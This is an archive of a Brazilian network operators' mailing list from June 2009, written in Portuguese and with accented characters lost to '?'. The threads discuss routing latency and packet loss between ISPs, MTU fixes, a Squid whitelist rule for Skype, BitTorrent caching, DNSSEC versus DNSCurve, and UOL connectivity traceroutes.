<4A43CB9B.6040206@tecwave.com.br> Message-ID: Parece que agora caiu de vez, ou pessoal da lista resolveu testar e eles bloquearam ICMP: routernet:~# traceroute 200.211.219.170 traceroute to 200.211.219.170 (200.211.219.170), 30 hops max, 40 byte packets 1 embratel-S1-1-0-1-3-6-3-0-gacc04.pae.embratel.net.br (189.86.49.221) 3.409 ms 3.655 ms 3.954 ms 2 ebt-T0-5-5-0-21-tcore01.pae.embratel.net.br (200.230.221.153) 27.546 ms 28.216 ms 28.886 ms 3 ebt-T0-5-0-0-tcore01.cta.embratel.net.br (200.230.251.218) 29.558 ms 30.239 ms 30.909 ms 4 ebt-T0-0-3-0-tcore01.ctamr.embratel.net.br (200.230.251.29) 31.582 ms 32.258 ms 32.882 ms 5 ebt-T0-3-0-0-tcore01.spo.embratel.net.br (200.230.251.10) 33.567 ms 34.237 ms 34.852 ms 6 ebt-C1-gacc03.spomb.embratel.net.br (200.230.242.142) 34.839 ms 30.712 ms 26.814 ms 7 * * * 8 * * * 9 * * * 10 * * * 11 * * * 12 * * * 13 * * * 2009/6/25 Alexandre Martini - Tecwave > Eu tenho notado, pois hoje tive q fazer um suporte remoto a um provedor q > tem link Embratel, a partir de meu link BRT, conex?o via protocolo VNC muito > inst?vel e com v?rias travadas. Estou no interior do RS. > > Rubens Kuhl escreveu: > > Estamos notando uma lat?ncia muito alta de tr?fego indo da Embratel >> para a Brasil Telecom: >> >> >> 4 9 ms 7 ms 9 ms embratel-G0-3-nacc02.soc.embratel.net.br >> [189.86.100.1] >> 5 10 ms 9 ms 11 ms 200.230.247.2 >> 6 11 ms 11 ms 11 ms ebt-P1-1-0-core03.spo.embratel.net.br >> [200.244.140.230] >> 7 12 ms 11 ms 18 ms ebt-C1-gacc03.spomb.embratel.net.br >> [200.230.242.142] >> 8 300 ms 300 ms 303 ms peer-P4-3-gacc03.spomb.embratel.net.br >> [200.211.219.170] >> 9 334 ms 339 ms 346 ms BrT-G7-1-spopa302.brasiltelecom.net.br >> [201.10.241.150] >> >> Algu?m mais notou algum efeito ex?tico como este ? >> >> >> Rubens >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> >> > > -- > > []s > > Alexandre Martini > Tecwave Internet > :: http://www.tecwave.com.br :: > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From jonas at braslink.com Fri Jun 26 12:20:50 2009 From: jonas at braslink.com (Jonas Junior) Date: Fri, 26 Jun 2009 12:20:50 -0300 Subject: [GTER] =?iso-8859-1?q?Virtua_n=E3o_acessa_v=E1rios_sites?= In-Reply-To: <011E245D38514877B146B8AAF2D6261B@ricardookh> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <011E245D38514877B146B8AAF2D6261B@ricardookh> Message-ID: <349a4c440906260820v25690abboa05936aaacb37498@mail.gmail.com> Clientes que passam por rotas da telefonica tem tido perdas de pacotes para acessar sites internacionais, seguindo as intrucoes do site http://www.abusar.org/manuais/mtu.html diminuindo o MTU nas maquinas dos usuarios as perdas param, parece que o problema afeta mais clientes que usam speedy compartilhado em servidor windows, chegamos a definir o MTU direto em alguns servidores, resolve o problema mas come?a a gerar outros com outros clientes, ent?o o ideal ? definir esses parametros na maquina do usuario que esta usando a internet, alguem esta tendo os mesmos problemas? Alguem sabe se a telefonica esta dando alguma previs?o de normaliza??o? Jonas 2009/6/25 Sergio Ricardo Marques > Boa tarde! > > Recebi v?rias reclama??es de clientes que n?o conseguem ver os seus > sites/e-mails, todos utilizando Net V?rtua. > Nas minhas duas conex?es, uma virtua e outra speedy, eu vejo normalmente. > Algu?m est? tendo o mesmo problema para acesso externo? Aqui eu n?o consigo > acessar o www.abusar.org e o www.wikipedia.org. > > Grato. > > Sergio. > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From rickmarx at globo.com Fri Jun 26 11:18:39 2009 From: rickmarx at globo.com (Sergio Ricardo Marques) Date: Fri, 26 Jun 2009 11:18:39 -0300 Subject: [GTER] Dominio yahoo References: <724d72960906260715m71a9d0c9qdf4527ac7e317a97@mail.gmail.com> Message-ID: Aqui carregando estranhamente MUITO r?pido tanto como V?rtua, como com o Speedy. Teste de e-mail ok. Saiu e chegou r?pido. Abra?os. Sergio. ----- Original Message ----- From: "Renato de Oliveira Diogo" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Friday, June 26, 2009 11:15 AM Subject: [GTER] Dominio yahoo Senhores bom dia alguem est? tendo dificuldades de acessar os dom?nios do yahoo? Na minha fila de e-mail todos os e-mail do yahoo est?o parados para entrega. Os sites n?o est?o sendo carregados (aparece o nome do site na barra de t?tulo, mas o site n?o carrega). Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br -- gter list https://eng.registro.br/mailman/listinfo/gter From filipe.m at hostdime.com.br Fri Jun 26 11:50:19 2009 From: filipe.m at hostdime.com.br (filipe mendes) Date: Fri, 26 Jun 2009 11:50:19 -0300 Subject: [GTER] =?iso-8859-1?q?Redund=E2ncia_de_sites?= In-Reply-To: <8b388dda0906260522s37c37edckc4cc8d84d241e837@mail.gmail.com> References: <1245988154.4a44453af2de6@webmail.internexxus.com.br> <8b388dda0906260522s37c37edckc4cc8d84d241e837@mail.gmail.com> Message-ID: ? um site de conteudo est?tico? qualquer coisa dinamica vai contra sua solucao.. ainda n conheco nenhum sistema para fs e db com failover em sites distantes On Friday, June 26, 2009, Lino Silva wrote: > Jefferson, > De uma olhada no Anycast (RFC 3330), os grandes provedores estao > usando essa t?cnica para fazer redund?ncia de DNSs. Bascamente voce > colcoa o mesmo endere?o IP em quantos servidores quiser e quem decide > como chegar em cada um ? o roteamento inter-dominio que voce tem na > rede. > Procura na NET que tem bastante material. > Abra?os > Lino > > 2009/6/26 Jefferson B. Limeira : >> Boa Noite Senhores, >> >> ?Venho humildimente pedir algumas id?ias, opini?es sobre a situa??o a seguir. >> Tenhos dois sites, distante uns 5km, ligados por um link de r?dio com boa >> velocidade (+-25Mpb/s). Estamos montando uma estrutura pra replica??o, onde >> pretendo manter a mesma estrutura de servidores em ambos lados. Tamb?m tenho em >> ambos os lados links sob demanda que podem atender minha necessidade. No >> entanto, pretendo manter um como principal e o segundo s? entrar em a??o quando >> o primeiro n?o mais estiver dispon?vel. >> ?Pensei em algo com DNS... um DNS com baixo ttl no site2 como prim?rio, >> apontando tudo pro site1 e em caso de falha de comunica??o, mudasse pra s? >> pr?prio. DNS secund?rio no site1, pra caso o site2 caia. Tenho automonia na >> configura??o do DNS de meus clientes, de forma posso apontar tudo pra meus >> sites. >> ?Estou no caminho certo? >> >> -- >> Jefferson B. Limeira >> Internexxus Tecnol?gica >> http://www.internexxus.com.br >> (44) 3029-3039 >> (44) 9911-1668 >> >> >> >> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From billpp at gmail.com Fri Jun 26 19:36:01 2009 From: billpp at gmail.com (Flavio Junior) Date: Fri, 26 Jun 2009 19:36:01 -0300 Subject: [GTER] Layer7 x Skype In-Reply-To: References: <58aa8d780906252016w7b4ca1cbu610e88bf87aabc73@mail.gmail.com> Message-ID: <58aa8d780906261536m63337fabh92ed4add8a3e694c@mail.gmail.com> Sim, sem nenhum problemas (alem dos "possiveis" com a libera?ao) -- Fl?vio do Carmo J?nior aka waKKu 2009/6/26 Wagner Santos > Fl?vio, > > Nessa tua solu??o tu consegue falar com quem est? fora da tua LAN? Pois > aqui > o Skype funciona bem para dentro da pr?pria LAN, j? fora, ele come?a > listando quem est? online, depois o pessoal cai todinho, repentinamente > volta a lista mas ao final, ningu?m fala com quem est? fora. > > 2009/6/26 Flavio Junior > > > Olha.. sinceramente nao sei te dizer se o skype vai funcionar, se o teu > > proxy nao permitir... > > > > Aqui eu tenho um cenario parecido, firewall em DROP e proxy em DENY.. So > > libero o que ? realmente necessario. > > > > A unica (e HORRIVEL) forma que consigo fazer o skype funcionar BEM > > (conectar > > nao basta, enviar mensagens sera sempre um problema) ? liberando no proxy > a > > conexao HTTPS para IP's. > > > > Como citei, ? uma solu?ao horrivel, vai contra toda minha ideia de > politica > > de DROP no proxy.. Mas mantenho meus relatorios sempre atualizados e vejo > > que na minha rede, ninguem ta abusando dessa "caracteristica" de acesso. > > At? > > por que ? complicado navegar em sites usando somente o IP, o site tem que > > permitir isso ou tu usar um "firebug" da vida pra ficar alteradno os > > hiperlinks, e ainda esse destino tem q estar disponivel pra HTTPS tambem. > > > > Bom, a linha ? a seguinte: > > squid.conf: > > acl whitelist url_regex -i "/etc/squid/whitelist.lst" > > # Impedindo o squidGuard de ser chamado para a whitelist > > redirector_access allow !whitelist !bannedsources > > http_access deny bannedsources !whitelist > > http_access allow whitelist > > > > /etc/squid/whitelist.lst: > > # Unica forma que encontrei de fazer o skype funcionar DECENTEMENTE foi: > > # Liberar conexoes SSL (porta 443) a destinos no formato IP. > > # Isso e horrivel! > > ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:443$ > > > > > > Mantive at? os comentarios originais ;) > > > > -- > > > > Fl?vio do Carmo J?nior aka waKKu > > > > > > 2009/6/18 Wagner Santos > > > > > Car at s, > > > > > > Tenho um firewall Linux com iptables, onde nossas pol?ticas padr?es s?o > > > todas DROP (INPUT, FORWARD e OUTPUT). Tudo funciona bem, exceto o Skype > > > (preciso que o Skype funcione para toda a rede). Tenho tudo devidamente > > > compilado e instalado por?m o Layer7 est? me retornado a seguinte > > mensagem: > > > > > > "layer7: couldn't get conntrack." > > > > > > J? fiz v?rias pesquisas mas n?o encontrei nenhuma solu??o, inclusive > > > pesquisei aqui na lista, mas n?o encontrei nada. > > > > > > Algu?m j? passou por isso? > > > > > > -- > > > Wagner Santos > > > 81 9127 9823 / 81 8781 9823 > > > > > > wagnerpaxs @NOSPAM gmail.com > > > wagner @NOSPAM dotlinux.net > > > > > > ICQ: 83709017 | Jabber: xwindow at jabber.org > > > > > > Linux User #408917 > > > DotLinux.Net - http://www.dotlinux.net/ > > > Debian-PE - > > > http://pe.debianbrasil.org/ > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > Wagner Santos > 81 9127 9823 / 81 8781 9823 > > wagnerpaxs @NOSPAM gmail.com > wagner @NOSPAM dotlinux.net > > ICQ: 83709017 | Jabber: xwindow at jabber.org > > Linux User #408917 > DotLinux.Net - http://www.dotlinux.net/ > Debian-PE - > http://pe.debianbrasil.org/ > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From antoniocarlospina at gmail.com Sat Jun 27 10:31:21 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Sat, 27 Jun 2009 10:31:21 -0300 Subject: [GTER] =?iso-8859-1?q?Virtua_n=E3o_acessa_v=E1rios_sites?= In-Reply-To: <349a4c440906260820v25690abboa05936aaacb37498@mail.gmail.com> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <011E245D38514877B146B8AAF2D6261B@ricardookh> <349a4c440906260820v25690abboa05936aaacb37498@mail.gmail.com> Message-ID: <86b352050906270631w127210ddif654fd13e847f957@mail.gmail.com> Recebemos uma posi??o da tiws de que estava normalizado, mas n?o sei dizer se ? global ou n?o. Em nossos testes, realmente normalizou. Abs Pina Em 26/06/09, Jonas Junior escreveu: > Clientes que passam por rotas da telefonica tem tido perdas de pacotes para > acessar sites internacionais, seguindo as intrucoes do site > http://www.abusar.org/manuais/mtu.html > diminuindo o MTU nas maquinas dos usuarios as perdas param, parece que o > problema afeta mais clientes que usam speedy compartilhado em servidor > windows, chegamos a definir o MTU direto em alguns servidores, resolve o > problema mas come?a a gerar outros com outros clientes, ent?o o ideal ? > definir esses parametros na maquina do usuario que esta usando a internet, > alguem esta tendo os mesmos problemas? > Alguem sabe se a telefonica esta dando alguma previs?o de normaliza??o? > > Jonas > > 2009/6/25 Sergio Ricardo Marques > >> Boa tarde! >> >> Recebi v?rias reclama??es de clientes que n?o conseguem ver os seus >> sites/e-mails, todos utilizando Net V?rtua. >> Nas minhas duas conex?es, uma virtua e outra speedy, eu vejo normalmente. >> Algu?m est? tendo o mesmo problema para acesso externo? Aqui eu n?o >> consigo >> acessar o www.abusar.org e o www.wikipedia.org. >> >> Grato. >> >> Sergio. >> >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Enviado do meu celular From fabriciofx at gmail.com Sat Jun 27 09:20:15 2009 From: fabriciofx at gmail.com (=?ISO-8859-1?Q?Fabr=EDcio_Cabral?=) Date: Sat, 27 Jun 2009 09:20:15 -0300 Subject: [GTER] Cache de BitTorrent In-Reply-To: <5e00a4be0906260657s6593b906s5a394f14b319a108@mail.gmail.com> References: <5e00a4be0906241105k569ed888j8fe2e6abdc07222c@mail.gmail.com> <4c2fd84e0906251140ga93719bid1d1245eb2c8a081@mail.gmail.com> <5e00a4be0906260657s6593b906s5a394f14b319a108@mail.gmail.com> Message-ID: <4c2fd84e0906270520p5064a528rb4922b4467f99b26@mail.gmail.com> 2009/6/26 Provedor Bogus : > Fabr?cio, > > ? ?Estou comentando in-line, ok ? Ok. Tamb?m vou comentar in-line, ok? :) > O cache ? 100% transparente e foi desenvolvido usando TPROXY. Assim, a > resposta para as requisi??es > s?o feitas usando os endere?os IP dos peers que por ventura forem > fornecedores da parte do arquivo solicitada > e somente ela. Certo. Imaginei que voc? estivesse usando o TPROXY mesmo. ;) Isso resolve o problema da reputa??o & cia. > O nosso cache n?o funciona como o Oversi que analisa o payload das > requisi??es para os > trackers e baixa junto com o peer da sua rede o mesmo conte?do para ent?o > participar como sendo um seeder. > Acho que essa forma seria juridicamente problem?tica. Totalmente. Seu cache *n?o* pode atuar como seeder em hip?tese alguma! > O tr?fego ? reconhecido atrav?s de an?lise de payload, mas, desenvolvemos um > algoritmo que otimiza bem > essa tarefa porque fica em kernel-mode. Como voc? resolveu o problema de detectar tr?fego bittorrent criptografado? > A m?quina supra-citada consegue > processar 400 mbps com 30% de carga. > N?o fizemos muitos testes de estresse porque consideramos essa performance > muito razo?vel. > Nosso plano n?o ? ter somente uma m?quina para toda a rede e sim dividir a > carga entre duas ou tr?s m?quinas. 400 Mbps? De quanto ? seu link internet? ;) > H? a op??o de se colocar uma m?quina para toda a rede e outra em hot > stand-by com Keepalived rodando > para se ter redund?ncia. > > A parte de disco fica por conta da m?quina de conte?do que tem capacidade de > processamento e > subsistema de disco apropriados para essa tarefa. Ok. > O cache de P2P difere em muito de um cache de Youtube, por exemplo. > No Youtube, muitas pessoas acessam v?deos de, em m?dia, 8 mega. Um arquivo > pequeno. > No P2P, poucas pessoas baixam arquivos grandes, na nossa m?dia, 1,5 giga. > Assim, o tempo para que o cache seja populado com apenas 3 arquivos ? muito > maior. > > 1 arquivo de 1,5 giga d? pra guardar ~ 183 arquivos do Youtube. > > Qual das duas situa??es tem mais chance de ter um hit ? :-) Depende. Voc? est? esperando receber o arquivo *todo* do bittorrent pra s? ent?o poder servi-lo atrav?s do seu cache? Dado que voc? j? tem um segmento (peda?o) do arquivo em seu cache e este segmento ? solicitado, voc? j? poderia servi-lo. Isto com certeza aumentaria o seu hit rate. > A diversidade de conte?do tamb?m ? um problema, pois, dependem de buscas > individuais > dos clientes, diferente do Youtube em que v?deos s?o acessados por sites de > blogs conhecidos > (como o Kibeloco e o Buteco da Net) ou mesmo enviados como refer?ncia em > e-mails. > Eu nunca recebi um .torrent de algu?m sugerindo que eu baixasse para dar uma > olhada. :-) N?o entendi este ponto. Na minha opini?o, *todo* o conte?do da sua rede depende dos seus usu?rios. Eles que ? que v?o determinar o seu tr?fego. Voc? pode ter um tr?fego pequeno de P2P em uma empresa por exemplo, mas grande de e-mail. No entando, o contr?rio seria o mais prov?vel em usu?rios dom?sticos. > Temos cerca de 300 mbps s? de tr?fego Torrent e isso ? insuficiente para > gerar um bom hit ratio. Ainda acho que a quest?o do hit rate ? de acordo com o conte?do a ser baixado. Baixo hit rate, s? se seus usu?rios est?o baixando conte?do muito diferente um dos outros, o que ? meio improv?vel. O hit rate do tr?fego web gira em torno de 30% e s? n?o ? maior (acredito eu), porque as p?ginas mais visitadas (como as de not?cias) tem um keep-alive baixo e portanto, s?o descartadas logo do cache. > Estamos com 5 TB ocupados e ainda estudando a pol?tica de replacement, mas, > temos muito > tempo para defin?-la j? que nem t?o cedo os 45 TB da m?quina ser?o ocupados. > :-) Espa?o n?o ? problema *hoje*, mas um dia ele vai ser. ;) Al?m do mais, se voc? conseguir otimizar isso, o custo do seu equipamento vai cair. J? vi papers na Internet que demonstraram (pelo menos na ?poca) que o cache P2P tende a se estabilizar quando chega em 500GB. Assim, um disco de 1TB seria mais que suficiente. > Provavelmente ela ser? baseada em uma busca do INFOHASH nos sites mininova, > isohunt e > torrentz para definir a popularidade do Torrent e tamb?m a quantidade de > vezes que ele foi baixado > pelos nossos usu?rios. Atrav?s disso geraremos um rank que ser? usado para > eliminar > os arquivos de menor popularidade. Tecnicamente parece ser uma boa id?ia, mas eu n?o a utilizaria. Por dois motivos: 1. Voc? fica dependente destes sites. Se eles sairem do ar ou mudarem a p?gina, como voc? vai pegar estas informa??es? 2. Isto pode implicar em problemas jur?dicos, tendo em vista que seu cache ? "espertinho" demais. Veja que a linha que separa o que ? legal do que ? ilegal ? muito t?nue. Voc? n?o pode nem fazer prefetching do conte?do, pois isto implicaria em "facilitar" para o usu?rio. Cache P2P s? ? pra repassar um conte?do (leia-se bytes mesmo) que j? foram encontrados e solicitados pelo usu?rio. []'s --fx From JCZucco at ucs.br Sat Jun 27 12:16:57 2009 From: JCZucco at ucs.br (Jeronimo Zucco) Date: Sat, 27 Jun 2009 12:16:57 -0300 Subject: [GTER] DJB: DNSSec x DNSCurve Message-ID: <20090627121657.11422hwqku0dk5wp@webmail.ucs.br> Fotos da apresenta??o do Daniel Bernstein hoje de manh? no FISL 10 comparando DNSSec x DNSCurve. E uma resposta ao desafio feito a ele: http://jczucco.blogspot.com/2009/06/djb-dnssec-x-dnscurve.html -- Jeronimo Zucco LPIC-1 Linux Professional Institute Certified Universidade de Caxias do Sul - NPDU http://jczucco.blogspot.com --------------------------------------- Essa mensagem foi enviada pelo UCS Mail From bruno at anid.com.br Sun Jun 28 13:11:58 2009 From: bruno at anid.com.br (Bruno Cabral) Date: Sun, 28 Jun 2009 13:11:58 -0300 (BRT) Subject: [GTER] Problemas com o UOL? Message-ID: <64265.189.71.37.238.1246205518.squirrel@187.45.84.2> Ola Algum dos srs est? com problemas de conectividade ao UOL? Vejam este trace, a perda no border router deles Packets Pings Host Loss% Snt Last Avg Best Wrst StDev (...) 5. 200.184.193.147 0.0% 21 51.4 54.6 50.7 116.3 14.1 6. ??? 7. fr1-border2.ix.uol.com.br 85.0% 21 52.9 53.3 51.8 55.2 1.7 8. 200.221.30.174 60.0% 21 51.7 55.2 51.7 64.8 4.5 9. home.uol.com.br 85.0% 21 61.7 56.0 52.3 61.7 5.0 []s, !3runo Cabral From paulojbe at gmail.com Sun Jun 28 15:09:21 2009 From: paulojbe at gmail.com (Paulo Estrela) Date: Sun, 28 Jun 2009 15:09:21 -0300 Subject: [GTER] DJB: DNSSec x DNSCurve In-Reply-To: <20090627121657.11422hwqku0dk5wp@webmail.ucs.br> References: <20090627121657.11422hwqku0dk5wp@webmail.ucs.br> Message-ID: Outra palestra bem interessante foi ele falando das falhas do DNSSEC e a ado??o m?nima, pra n?o dizer rid?cula. Mostrou ainda o valor gasto com o desenvolvimento frente a baix?ssima utiliza??o. Muito boa! At? mais, Paulo Estrela http://tabugado.com http://pauloestrela.wordpress.com 2009/6/27 Jeronimo Zucco > Fotos da apresenta??o do Daniel Bernstein hoje de manh? no FISL 10 > comparando DNSSec x DNSCurve. E uma resposta ao desafio feito a ele: > > http://jczucco.blogspot.com/2009/06/djb-dnssec-x-dnscurve.html > > -- > Jeronimo Zucco > LPIC-1 Linux Professional Institute Certified > Universidade de Caxias do Sul - NPDU > > http://jczucco.blogspot.com > > --------------------------------------- > Essa mensagem foi enviada pelo UCS Mail > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From casfre at gmail.com Sun Jun 28 22:16:56 2009 From: casfre at gmail.com (casfre at gmail.com) Date: Sun, 28 Jun 2009 22:16:56 -0300 Subject: [GTER] Problemas com o UOL? In-Reply-To: <64265.189.71.37.238.1246205518.squirrel@187.45.84.2> References: <64265.189.71.37.238.1246205518.squirrel@187.45.84.2> Message-ID: Ol?, > Algum dos srs est? com problemas de conectividade ao UOL? > Vejam este trace, a perda no border router deles > > ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? Packets ? ? ? ? ? ? ? Pings > ?Host ? ? ? ? ? ? ? ? ? ? ? ? Loss% ? Snt ? Last ? Avg ?Best ?Wrst StDev > (...) > ?5. 200.184.193.147 ? ? ? ? ? ?0.0% ? ?21 ? 51.4 ?54.6 ?50.7 116.3 ?14.1 > ?6. ??? > ?7. fr1-border2.ix.uol.com.br 85.0% ? ?21 ? 52.9 ?53.3 ?51.8 ?55.2 ? 1.7 > ?8. 200.221.30.174 ? ? ? ? ? ?60.0% ? ?21 ? 51.7 ?55.2 ?51.7 ?64.8 ? 4.5 > ?9. home.uol.com.br ? ? ? ? ? 85.0% ? ?21 ? 61.7 ?56.0 ?52.3 ?61.7 ? 5.0 Sem perdas aqui. ADSL, CTBC. Obrigado. C?ssio From antoniocarlospina at gmail.com Sun Jun 28 22:23:04 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Sun, 28 Jun 2009 22:23:04 -0300 Subject: [GTER] Problemas com o UOL? In-Reply-To: <64265.189.71.37.238.1246205518.squirrel@187.45.84.2> References: <64265.189.71.37.238.1246205518.squirrel@187.45.84.2> Message-ID: <86b352050906281823l1578c3d4kcaf7eb4d43f3a1fd@mail.gmail.com> Nenhum problema pela OI. N?o ser? algo no link UOL x INTELIG ? Isso produziria o problema que voc? v? mas n?o afetaria clientes que entrassem via OI ou Telefonica. Abs 2009/6/28 Bruno Cabral > Ola > > Algum dos srs est? com problemas de conectividade ao UOL? > Vejam este trace, a perda no border router deles > > Packets Pings > Host Loss% Snt Last Avg Best Wrst StDev > (...) > 5. 200.184.193.147 0.0% 21 51.4 54.6 50.7 116.3 14.1 > 6. ??? > 7. fr1-border2.ix.uol.com.br 85.0% 21 52.9 53.3 51.8 55.2 1.7 > 8. 200.221.30.174 60.0% 21 51.7 55.2 51.7 64.8 4.5 > 9. home.uol.com.br 85.0% 21 61.7 56.0 52.3 61.7 5.0 > > []s, !3runo Cabral > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From juliano at cyberweb.com.br Sun Jun 28 22:25:42 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Sun, 28 Jun 2009 22:25:42 -0300 Subject: [GTER] Problemas com o UOL? In-Reply-To: <86b352050906281823l1578c3d4kcaf7eb4d43f3a1fd@mail.gmail.com> References: <64265.189.71.37.238.1246205518.squirrel@187.45.84.2> <86b352050906281823l1578c3d4kcaf7eb4d43f3a1fd@mail.gmail.com> Message-ID: <4A481816.90807@cyberweb.com.br> Nenhum problema via Intelig 3. 201-70-204-17.intelignet.com.br 0% 5 5 0 0 20 85 4. intelig-ae4-nxrspo102.intelignet.com.br 0% 5 5 26 25 25 26 5. 200.184.193.147 0% 5 5 36 25 30 36 6. ??? 7. fr2-border3.ix.uol.com.br 0% 5 5 30 25 26 30 8. 200.221.30.178 0% 5 5 27 26 30 43 9. home.uol.com.br 0% 5 5 26 26 26 27 Juliano Antonio Carlos Pina escreveu: > Nenhum problema pela OI. > N?o ser? algo no link UOL x INTELIG ? Isso produziria o problema que voc? v? > mas n?o afetaria clientes que entrassem via OI ou Telefonica. > > Abs > > 2009/6/28 Bruno Cabral > > >> Ola >> >> Algum dos srs est? com problemas de conectividade ao UOL? >> Vejam este trace, a perda no border router deles >> >> Packets Pings >> Host Loss% Snt Last Avg Best Wrst StDev >> (...) >> 5. 200.184.193.147 0.0% 21 51.4 54.6 50.7 116.3 14.1 >> 6. ??? >> 7. fr1-border2.ix.uol.com.br 85.0% 21 52.9 53.3 51.8 55.2 1.7 >> 8. 200.221.30.174 60.0% 21 51.7 55.2 51.7 64.8 4.5 >> 9. home.uol.com.br 85.0% 21 61.7 56.0 52.3 61.7 5.0 >> >> []s, !3runo Cabral >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From agr.listas at gmail.com Mon Jun 29 00:11:39 2009 From: agr.listas at gmail.com (Alex Robertson) Date: Mon, 29 Jun 2009 00:11:39 -0300 Subject: [GTER] Gerador de Pacotes In-Reply-To: References: Message-ID: Maur?cio, O SIPp pode te ajudar. SIPp can also send media (RTP) traffic through RTP echo and RTP / pcap replay. Media can be audio or audio+video. http://sipp.sourceforge.net/ Boa sorte AGR 2009/6/25 Mauricio Bento Ghem : > Ol? Pessoal, > Um pouco off-topic, portanto, qualquer coisa descartem a mensagem. > > Estou trabalhando em cima do TCC e tenho a necessidade de gerar pacotes RTP > (e RTCP) atrav?s de uma rede. Posso rodar uma aplica??o para obter estes > pacotes (videoconfer?ncia por exemplo), mas eu gostaria de poder fazer um * > tweak* neste pacote. > > Se algu?m souber um simulador, uma API ou similar que d? conta do recado, > agrade?o. > > Att, > Maur?cio. > > -- > Maur?cio Bento Ghem > Website: www.bentow.com.br > Email: mauriciobentoghem at gmail.com > Home Phone: +55 (51) 3524-9192 > Mobile Phone: +55 (51) 8146-8553 > Skype: mauriciobentow > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- Alex G Robertson - RJ - From bruno at anid.com.br Sun Jun 28 22:38:21 2009 From: bruno at anid.com.br (Bruno Cabral) Date: Sun, 28 Jun 2009 22:38:21 -0300 (BRT) Subject: [GTER] Problemas com o UOL? In-Reply-To: <86b352050906281823l1578c3d4kcaf7eb4d43f3a1fd@mail.gmail.com> References: <64265.189.71.37.238.1246205518.squirrel@187.45.84.2> <86b352050906281823l1578c3d4kcaf7eb4d43f3a1fd@mail.gmail.com> Message-ID: <59789.189.71.63.77.1246239501.squirrel@187.45.84.2> > Nenhum problema pela OI. > N?o ser? algo no link UOL x INTELIG ? Isso produziria o problema > que voc? v? mas n?o afetaria clientes que entrassem via OI ou Telefonica. A origem ? um bloco 187, ser? que ? isso? Tem algu?m do UOL aqui? []s, !3runo Cabral From gustkiller at gmail.com Sun Jun 28 22:23:59 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Sun, 28 Jun 2009 22:23:59 -0300 Subject: [GTER] Problemas com o UOL? In-Reply-To: References: <64265.189.71.37.238.1246205518.squirrel@187.45.84.2> Message-ID: <276fbe8b0906281823k110c876dk80414908164f9259@mail.gmail.com> perfeito via Oi 2009/6/28 casfre at gmail.com > Ol?, > > > Algum dos srs est? com problemas de conectividade ao UOL? > > Vejam este trace, a perda no border router deles > > > > Packets Pings > > Host Loss% Snt Last Avg Best Wrst StDev > > (...) > > 5. 200.184.193.147 0.0% 21 51.4 54.6 50.7 116.3 14.1 > > 6. ??? > > 7. fr1-border2.ix.uol.com.br 85.0% 21 52.9 53.3 51.8 55.2 1.7 > > 8. 200.221.30.174 60.0% 21 51.7 55.2 51.7 64.8 4.5 > > 9. home.uol.com.br 85.0% 21 61.7 56.0 52.3 61.7 5.0 > > Sem perdas aqui. ADSL, CTBC. > > Obrigado. > > C?ssio > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From renato.diogo at gmail.com Mon Jun 29 09:30:30 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Mon, 29 Jun 2009 09:30:30 -0300 Subject: [GTER] Problemas com o UOL? In-Reply-To: <276fbe8b0906281823k110c876dk80414908164f9259@mail.gmail.com> References: <64265.189.71.37.238.1246205518.squirrel@187.45.84.2> <276fbe8b0906281823k110c876dk80414908164f9259@mail.gmail.com> Message-ID: <724d72960906290530k111a1d86sb07dd7150f64e2dc@mail.gmail.com> Pela Telefonica, tamb?m est? sem problemas. Por?m daqui n?o ? bloco 187. Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/28 Gustavo Santos : > perfeito via Oi > > 2009/6/28 casfre at gmail.com > >> Ol?, >> >> > Algum dos srs est? com problemas de conectividade ao UOL? >> > Vejam este trace, a perda no border router deles >> > >> > ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? Packets ? ? ? ? ? ? ? Pings >> > ?Host ? ? ? ? ? ? ? ? ? ? ? ? Loss% ? Snt ? Last ? Avg ?Best ?Wrst StDev >> > (...) >> > ?5. 200.184.193.147 ? ? ? ? ? ?0.0% ? ?21 ? 51.4 ?54.6 ?50.7 116.3 ?14.1 >> > ?6. ??? >> > ?7. fr1-border2.ix.uol.com.br 85.0% ? ?21 ? 52.9 ?53.3 ?51.8 ?55.2 ? 1.7 >> > ?8. 200.221.30.174 ? ? ? ? ? ?60.0% ? ?21 ? 51.7 ?55.2 ?51.7 ?64.8 ? 4.5 >> > ?9. home.uol.com.br ? ? ? ? ? 85.0% ? ?21 ? 61.7 ?56.0 ?52.3 ?61.7 ? 5.0 >> >> ? ?Sem perdas aqui. ADSL, CTBC. >> >> ? Obrigado. >> >> C?ssio >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? 